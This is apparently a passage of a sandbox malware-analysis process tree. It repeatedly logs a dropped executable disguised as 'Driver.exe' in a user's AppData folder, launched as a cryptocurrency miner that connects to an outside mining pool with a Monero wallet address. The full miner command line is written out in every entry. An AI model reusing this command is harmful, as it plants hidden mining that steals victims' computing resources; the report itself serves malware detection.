      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:820
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
      • Executes dropped EXE
      PID:1504
    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
      2⤵
        PID:1424
      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
        2⤵
          PID:1996
        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
          2⤵
            PID:1784
          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
            2⤵
              PID:1456
            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
              2⤵
                PID:2008
              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                2⤵
                  PID:1424
                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                  2⤵
                    PID:980
                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                    2⤵
                      PID:1752
                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                      2⤵
                        PID:2320
                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                        2⤵
                          PID:1652
                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                          2⤵
                            PID:2324
                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                            2⤵
                              PID:1808
                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                              2⤵
                                PID:1896
                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                2⤵
                                  PID:2572
                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                  2⤵
                                    PID:1652
                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                    2⤵
                                      PID:2512
                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                      2⤵
                                        PID:584
                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                        2⤵
                                          PID:1416
                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                          2⤵
                                            PID:2304
                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                            2⤵
                                              PID:484
                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                              2⤵
                                                PID:2736
                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                2⤵
                                                  PID:2452
                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                  2⤵
                                                    PID:2568
                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                    2⤵
                                                      PID:2352
                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                      2⤵
                                                        PID:2900
                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                        2⤵
                                                          PID:2300
                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                          2⤵
                                                            PID:2184
                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                            2⤵
                                                              PID:1752
                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                              2⤵
                                                                PID:324
                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                2⤵
                                                                  PID:2216
                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                  2⤵
                                                                    PID:2768
                                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                    2⤵
                                                                      PID:1096
                                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                      2⤵
                                                                        PID:2628
                                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                        2⤵
                                                                          PID:1952
                                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                          2⤵
                                                                            PID:2332
                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                            2⤵
                                                                              PID:908
                                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                              2⤵
                                                                                PID:2200
                                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                2⤵
                                                                                  PID:1912
                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                  2⤵
                                                                                    PID:3048
                                                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                    2⤵
                                                                                      PID:1492
                                                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                      2⤵
                                                                                        PID:1296
                                                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                        2⤵
                                                                                          PID:2608
                                                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                          2⤵
                                                                                            PID:1696
                                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                            2⤵
                                                                                              PID:1488
                                                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                              2⤵
                                                                                                PID:1960
                                                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                2⤵
                                                                                                  PID:1672
                                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                  2⤵
                                                                                                    PID:1496
                                                                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                    2⤵
                                                                                                      PID:2176
                                                                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                      2⤵
                                                                                                        PID:1236
                                                                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                        2⤵
                                                                                                          PID:2108
                                                                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                          2⤵
                                                                                                            PID:2012
                                                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                            2⤵
                                                                                                              PID:856
                                                                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                              2⤵
                                                                                                                PID:2568
                                                                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                2⤵
                                                                                                                  PID:1216
                                                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                  2⤵
                                                                                                                    PID:1720
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                    2⤵
                                                                                                                      PID:2016
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                      "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                      2⤵
                                                                                                                        PID:2164
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                        2⤵
                                                                                                                          PID:3048
                                                                                                                        • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                          "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                          2⤵
                                                                                                                            PID:2664
                                                                                                                          • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                            "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                            2⤵
                                                                                                                              PID:2208
                                                                                                                            • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                              "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                              2⤵
                                                                                                                                PID:2928
                                                                                                                              • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                2⤵
                                                                                                                                  PID:1264
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                  2⤵
                                                                                                                                    PID:2764
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.hashvault.pro:3333 -u 44FEKL4SFwbd3jdcsNNBTrBkRfqdhebqMEdu5YWGXC3GgoR6zTUVr9P7oUY6j69netMcXN39h6w37Z2FwNmMJZHFSoLXgte -p x -k -v=0 --donate-level=1 -t 4
                                                                                                                                    2⤵
                                                                                                                                      PID:560
